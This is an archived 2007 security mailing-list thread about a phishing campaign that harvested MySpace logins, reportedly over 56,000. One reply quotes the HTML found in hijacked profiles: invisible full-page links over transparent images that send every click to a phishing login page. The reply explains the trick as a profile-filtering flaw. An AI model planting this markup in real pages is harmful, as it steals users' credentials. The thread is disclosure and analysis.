[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Grab a myspace credential

To: codeshepherd@xxxxxxxxx
Subject: Re: [Full-disclosure] Grab a myspace credential
From: wac <waldoalvarez00@xxxxxxxxx>
Date: Tue, 16 Jan 2007 09:55:51 -0500

On 1/16/07, Deepan <codeshepherd@xxxxxxxxx> wrote:


On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> "but at some point all this abuse will likely start sending users off
> to another service. "
>
> thats only --if the know if they are being abused.. most of them are
> not coherent about any such issues..
>
>
>
> On 1/15/07, Kevin Pawloski <kpawloski@xxxxxxxxx> wrote:
>         The level of phishing sites targeting MySpace and bot related
It is not quiet easy to fool 56000+ users using phishing sites. I wonder
how Mark is doing it.




Hmm... Oh no is very easy, yes very easy what he is doing. He left some
traces on some of the "cracked" accounts, I was expectig of somebody to
comment earlier since I've been a couple of hours since the initial post.

When you modify a profile you can add this to the data of the profile, you
know those HTML customizations. I found this on one of the accounts that
really got my attention a little bit more than the girl of the account :P

HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/";><img
style="border-width:0px;width:2024px; height:1768px;" src="
http://x.myspace.com/images/clear.gif";></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;" href="
http://marcolano.com/login/";><img style="border-width:0px;width:2024px;
height:1768px;" src="http://x.myspace.com/images/clear.gif";></a><embed
allowScriptAccess="never" allowNetworking="internal" enableJSURL="false"
enableHREF="false" saveEmbedTags="true" src="
http://www.../mov/cid_3277_f.mov"; width="1" height="1">

As you might see, this creates a huge invisible link in the page in front of
everything, so when you click into anything on the page like a link or
anything it will take you to that phising website so ppl beleive that the
account expired and enter their user+pass. Now I beleive that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still beleive that.

Regards
Waldo

         activity that has been targeting MySpace lately is pretty
>         alarming. Granted there is no real financial risk if an
>         account gets compromised for the user but at some point all
>         this abuse will likely start sending users off to another
>         service.
>
>         Kevin
>
>
>         On 1/15/07, North, Quinn <QNorth@xxxxxxx> wrote:
>                 "youmustbecompleteretards@xxxxxxxxx
:doyouhonestlythinkiwillputmyrealpass
>                 wordhere"
>
>                 ...at least there is some hope left in the world :-\
>
>                 --=Q=--
>
>                 -----Original Message-----
>                 From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
>                 [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On
>                 Behalf Of Emma
>                 Perdue
>                 Sent: Monday, January 15, 2007 7:48 AM
>                 To: full-disclosure@xxxxxxxxxxxxxxxxx
>                 Subject: [Full-disclosure] Grab a myspace credential
>
>                 56000+ and counting
>
>                 http://www.marcolano.com/login/myspace.txt
>
>                 --
>                 *Emma aka TINK*
>
>                 _______________________________________________
>                 Full-Disclosure - We believe in it.
>                 Charter:
>                 http://lists.grok.org.uk/full-disclosure-charter.html
>                 Hosted and sponsored by Secunia - http://secunia.com/
>
>                 _______________________________________________
>                 Full-Disclosure - We believe in it.
>                 Charter:
>                 http://lists.grok.org.uk/full-disclosure-charter.html
>                 Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>         _______________________________________________
>         Full-Disclosure - We believe in it.
>         Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>         Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
-----------------------------------------------
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/

I am a programmer by day,
I dig grave for other programmers by night.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Grab a myspace credential
  - From: K F (lists)

References:
- Re: [Full-disclosure] Grab a myspace credential
  - From: North, Quinn
- Re: [Full-disclosure] Grab a myspace credential
  - From: Kevin Pawloski
- Re: [Full-disclosure] Grab a myspace credential
  - From: Peter Dawson
- Re: [Full-disclosure] Grab a myspace credential
  - From: Deepan

Prev by Date: Re: [Full-disclosure] iDefense Q-1 2007 Challenge
Next by Date: Re: [Full-disclosure] iDefense Q-1 2007 Challenge
Previous by thread: Re: [Full-disclosure] Grab a myspace credential
Next by thread: Re: [Full-disclosure] Grab a myspace credential
Index(es):
- Date
- Thread